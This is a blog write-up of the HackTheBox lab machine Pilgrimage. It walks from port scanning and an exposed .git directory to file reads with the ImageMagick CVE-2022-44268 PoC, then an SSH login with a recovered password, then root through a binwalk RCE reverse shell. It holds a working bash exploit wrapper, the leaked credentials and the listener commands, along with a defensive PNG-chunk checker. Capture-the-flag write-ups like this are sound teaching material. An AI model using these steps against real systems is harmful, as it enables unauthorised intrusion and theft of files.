cwoellner.com ~ personal website & blog

Writeup of Pilgrimage From HackTheBox

Published on: Monday, Nov 27, 2023

Getting a foothold and user flag

For the initial port scan, we use the following nmap command:

nmap -sS -A -Pn -T5 -p- -oN nmap.txt 10.129.222.8

And receive the following results:

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   3072 20be60d295f628c1b7e9e81706f168f3 (RSA)
|   256 0eb6a6a8c99b4173746e70180d5fe0af (ECDSA)
|_  256 d14e293c708669b4d72cc80b486e9804 (ED25519)
80/tcp open  http
|_http-title: Did not follow redirect to http://pilgrimage.htb/

The website lets us register, log in and upload images. The rules for the image upload are quite relaxed and a payload hidden in the EXIF data can easily be uploaded, but I did not find any way to get the uploaded image passed to the PHP engine. So I started brute-forcing directories and found an exposed .git directory:

>>> ffuf -u http://pilgrimage.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -mc 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://pilgrimage.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/quickhits.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

[Status: 200, Size: 23, Words: 2, Lines: 2, Duration: 29ms]
    * FUZZ: /.git/HEAD

[Status: 200, Size: 195, Words: 13, Lines: 2, Duration: 29ms]
    * FUZZ: /.git/logs/HEAD

[Status: 200, Size: 92, Words: 9, Lines: 6, Duration: 31ms]
    * FUZZ: /.git/config

[Status: 200, Size: 3768, Words: 22, Lines: 16, Duration: 31ms]
    * FUZZ: /.git/index

[Status: 200, Size: 6166, Words: 1648, Lines: 172, Duration: 30ms]
    * FUZZ: /login.php

[Status: 200, Size: 6173, Words: 1646, Lines: 172, Duration: 47ms]
    * FUZZ: /register.php 

The .git directory can be used to extract the source code of the repository. I use a tool called GitDump to accomplish this.

Looking at index.php I find two potential points of attack: an exec() call that invokes ImageMagick, and a connection to an SQLite database. Upon further research, I find a recent ImageMagick vulnerability with a public PoC: CVE-2022-44268. It allows me to read files on the target; to simplify usage, I write a small bash wrapper around the PoC:

#!/bin/bash
# Build the crafted image.png for the file named in $1 using the PoC (a cargo project)
cargo run -q "$1"
# Upload it and pull the URL of the converted image out of the redirect Location header
url=$(curl -F "toConvert=@image.png" http://pilgrimage.htb -i -s | grep Location | sed 's/Location: \/?message\=\(.*\)&status=success/\1/' | tr -d '\r')
# Download the converted image
curl "$url" --output output.png -s
rm image.png
# identify -verbose prints the embedded profile as hex lines; strip the surrounding output and decode it
hex=$(identify -verbose output.png | head -n -12 | tail -n +102 | tr -d '\n')
python -c "print(bytes.fromhex('$hex'))"

All I have to do is run “./exploit.sh /etc/passwd” and, if the user the web server runs ImageMagick as has permission to read it, I get the file contents back. I first check /etc/passwd; the exploit returns the file and I now know the name of the local user: emily.
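From the defender's side, the upload handler could have refused such files before they ever reached ImageMagick. The following PNG chunk inspector is an added example (not from this post or the PoC): it walks the chunks, verifies each CRC, and reports any tEXt/zTXt/iTXt chunk whose keyword is "profile", the trigger CVE-2022-44268 relies on. build_png constructs a minimal test image and is an assumption of this example, not part of the box.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}

def iter_chunks(data):
    """Yield (type, payload) for each chunk, refusing truncated or CRC-corrupt ones."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(ctype + payload) != crc:
            raise ValueError("CRC mismatch in chunk %r" % ctype)
        yield ctype, payload
        pos = end
        if ctype == b"IEND":
            break

def text_keywords(data):
    """Keywords of all tEXt/zTXt/iTXt chunks (the keyword ends at the first NUL byte)."""
    return [payload.split(b"\x00", 1)[0].decode("latin-1")
            for ctype, payload in iter_chunks(data) if ctype in TEXT_CHUNKS]

def unsafe_for_imagemagick(data):
    """True if a text chunk carries the 'profile' keyword that CVE-2022-44268 abuses."""
    return any(k.lower() == "profile" for k in text_keywords(data))

def build_png(text_chunks):
    """Constructed 1x1 greyscale PNG with the given (keyword, value) tEXt chunks, for testing."""
    def chunk(ctype, payload):
        return (struct.pack(">I", len(payload)) + ctype + payload
                + struct.pack(">I", zlib.crc32(ctype + payload)))
    body = chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    for key, val in text_chunks:
        body += chunk(b"tEXt", key + b"\x00" + val)
    body += chunk(b"IDAT", zlib.compress(b"\x00\x80")) + chunk(b"IEND", b"")
    return PNG_SIG + body
```

Such a filter only blocks the known trigger; patching ImageMagick is the actual fix, and the filter is a stopgap for the window before that happens.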

The next file I try is the SQLite database. Scrolling through the raw database dump I find something that looks like credentials:

[screenshot: sqlite credentials]

I try to log in over SSH with the credentials emily:abigchonkyboi123 and the password is accepted. I now have access to the user flag.

Root Flag

As usual, I start off by running LinPEAS and find an unusual process:

════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root         655  0.0  0.0   6816  3004 ?        Ss   Jun25   0:00 /bin/bash /usr/sbin/malwarescan.sh
root         683  0.0  0.0   2516   716 ?        S    Jun25   0:00  _ /usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/
root         684  0.0  0.0   6816  2440 ?        S    Jun25   0:00  _ /bin/bash /usr/sbin/malwarescan.sh

I can read the malwarescan file and take a closer look at it:

#!/bin/bash

# binwalk signature names that cause a new file to be deleted
blacklist=("Executable script" "Microsoft executable")

# Watch the shrunk directory; every CREATE event arrives as one line from inotifywait
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
	filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
	# binwalk -e both scans and extracts the new file (and, per the process list above, this runs as root)
	binout="$(/usr/local/bin/binwalk -e "$filename")"
	for banned in "${blacklist[@]}"; do
		if [[ "$binout" == *"$banned"* ]]; then
			/usr/bin/rm "$filename"
			break
		fi
	done
done

Whenever a new file appears in the shrunk directory, which normally happens after an uploaded image has been resized, it gets passed to binwalk. Since I was not familiar with binwalk, I looked up whether there were any recent vulnerabilities and found a writeup of a recent RCE as well as a PoC.

I cloned the PoC repo, generated a payload, uploaded it through the website and got nothing back. Next I placed the file manually in the directory as the emily user and got a reverse shell as root.

>>> nc -lnvp 4444 
Listening on 0.0.0.0 4444
Connection received on 10.129.163.225 51056
id
uid=0(root) gid=0(root) groups=0(root)